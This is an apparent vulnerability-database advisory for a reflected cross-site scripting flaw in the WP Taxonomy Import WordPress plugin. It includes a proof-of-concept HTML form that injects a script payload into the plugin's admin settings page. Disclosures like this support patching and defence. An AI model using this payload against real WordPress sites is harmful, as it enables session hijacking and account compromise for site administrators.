WordPress Plugin Vulnerabilities
WP Taxonomy Import <= 1.0.4 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
Proof of Concept
<html> <body> <form method="post" action="https://example.com/wp-admin/options-general.php?page=wp-taxonomy-import%2Fwp-taxonomy-import.php"> <input id="bulkCategoryList" type="text" name="bulkCategoryList" value="</textarea><script>alert(/XSS/)</script>" /> <input id="postsubmit" type="submit" name="submait" value="submit" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
kaikaix
Submitter
kaikaix
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-22 (about 1 years ago)
Added
2022-08-22 (about 1 years ago)
Last Updated
2023-05-11 (about 1 years ago)